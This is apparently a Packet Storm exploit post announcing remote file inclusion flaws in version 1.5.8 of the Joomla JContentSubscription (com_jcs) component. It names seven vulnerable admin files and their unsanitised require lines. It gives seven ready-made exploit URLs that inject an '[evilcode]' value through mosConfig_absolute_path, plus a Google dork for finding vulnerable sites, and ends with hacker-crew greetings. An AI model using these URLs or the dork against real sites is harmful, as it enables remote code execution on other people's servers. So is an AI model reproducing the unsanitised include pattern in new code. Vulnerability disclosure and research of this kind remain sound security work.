The Joomla JContentSubscription component version 1.5.8 suffers from multiple remote file inclusion vulnerabilities.
1e8c699e4f23dc2d8c73c35769525ab64c9652f7089a36cf56052544d576b21a# JContentSubscription Joomla Component 1.5.8 Multiply Remote File Include Vulnerability
Component : com_jcs version 1.5.8 - payable component
Dicovered by : NoGe
Contact : pace.noge@hotmail.com
==================================================================================================================================
# Vulnerable file
/administrator/components/com_jcs/jcs.function.php
line 6 require_once( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
/administrator/components/com_jcs/view/add.php
line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
/administrator/components/com_jcs/view/history.php
line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
/administrator/components/com_jcs/view/register.php
line 6 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
/administrator/components/com_jcs/views/list.sub.html.php
line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );
/administrator/components/com_jcs/views/list.user.sub.html.php
line 7 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );
/administrator/components/com_jcs/views/reports.html.php
line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );
# Exploit
http://localhost/path/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=[evilcode]
# Google dork
inurl:com_jcs
==================================================================================================================================
# Greetz
all crew #papuahacker #baliemhackerlink #nyubicrew
skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie str0ke
yooogy H312Y Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq
http://kapukvalley.net member
==================================================================================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed